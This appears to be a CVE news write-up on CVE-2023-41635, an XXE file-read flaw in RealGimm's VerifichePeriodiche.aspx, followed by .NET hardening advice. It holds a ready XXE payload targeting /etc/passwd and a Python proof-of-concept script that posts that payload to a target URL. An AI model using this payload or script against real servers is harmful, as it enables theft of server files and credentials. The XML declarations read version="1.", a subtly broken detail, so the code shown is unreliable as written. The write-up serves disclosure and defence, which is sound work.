CVE CyberSecurity Database News

CVE-2023-41635 - How XXE Lets Hackers Read Any File on GruppoSCAI RealGimm v1.1.37p38

Poster -

In this post, we’ll dive deep into a serious vulnerability—CVE-2023-41635—that affects the RealGimm system by GruppoSCAI. If you use RealGimm v1.1.37p38 and its VerifichePeriodiche.aspx page, you might be at risk of attackers reading sensitive files from your server. Let’s break down exactly how this works and what you can do about it.

What is CVE-2023-41635?

This vulnerability is a classic XML External Entity (XXE) bug. Here, an attacker uploads a special XML file to the VerifichePeriodiche.aspx web page. Because the page doesn’t properly restrict what XML can do, the attacker’s XML is allowed to reference files on the server’s file system. That means anyone can read files like C:\Windows\System32\drivers\etc\hosts or /etc/passwd, depending on the operating system.

Steals confidential files: Read out configs, secrets, password files.

- Further exploitation: The attackers may even try SSRF or privilege escalation depending on setup.

How does it work?

The VerifichePeriodiche.aspx code takes in XML input and uses a .NET XML parser that’s not locked down. When a user submits XML data (maybe as an upload or a POST parameter), the component parses it without disabling external entities.

Attackers can submit XML containing a reference to an external file. The .NET parser will happily fetch and include the contents in the parsed document—leaking that file’s content in the response or error message.

Here’s what a vulnerable code snippet might look like in C#

// Don't do this! This is vulnerable to XXE
XmlDocument doc = new XmlDocument();
doc.Load(request.InputStream); // Takes XML directly from user input
// Processes the XML further...

The critical problem: by default, XmlDocument allows external entity expansion!

Here’s an example XML that targets the /etc/passwd file on Linux servers

<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>

When this is parsed by the vulnerable .NET code, the &xxe; entity is replaced with the contents of /etc/passwd. The attacker might get this data back in the HTTP response, or somewhere in application logs or error messages.

Capture the Response

The attacker watches the HTTP response for file contents, or looks for error messages that echo back the entity content.

Proof-of-Concept Exploit

Below, you’ll find a simple Python script that demonstrates exploitation. Never run this on systems you don’t own or have permission to test!

import requests

url = 'https://target-site/RealGimm/VerifichePeriodiche.aspx';
xml_payload = '''<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
'''

headers = {
    'Content-Type': 'application/xml'
}

response = requests.post(url, data=xml_payload, headers=headers)
print(response.text)

Replace the URL and XML as needed. If the site is vulnerable, you may see /etc/passwd (in Linux) or a Windows file leak in the output.

How to Fix It

1. Update your software.
GruppoSCAI should provide a patched version. If you’re running v1.1.37p38, check for updates on the GruppoSCAI support site.

2. Lock down XML parsers!
If you’re developing, always disable dangerous features like external entity expansion. Here’s how you do it in .NET:

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit; // Block DTDs entirely

XmlReader reader = XmlReader.Create(request.InputStream, settings);
XmlDocument doc = new XmlDocument();
doc.Load(reader);

3. Input Validation
Validate incoming files or XML. Use strict allow-lists.

References

- Official NVD Entry for CVE-2023-41635
- GruppoSCAI RealGimm Product Page
- OWASP XXE Prevention Guide
- Microsoft Docs: Preventing XXE in .NET

Summary

CVE-2023-41635 is a dangerous XXE vulnerability in RealGimm v1.1.37p38’s VerifichePeriodiche.aspx. If exploited, attackers can steal files right off your server. The fix: patch your software and lock down how XML is processed! For any IT teams using RealGimm, treating this bug seriously is a must to avoid data leaks and potential ransomware.


*Stay safe, patch fast—and always treat user input with suspicion, especially when it comes to XML!*

Timeline

Published on: 08/31/2023 14:15:08 UTC
Last modified on: 09/11/2023 22:15:08 UTC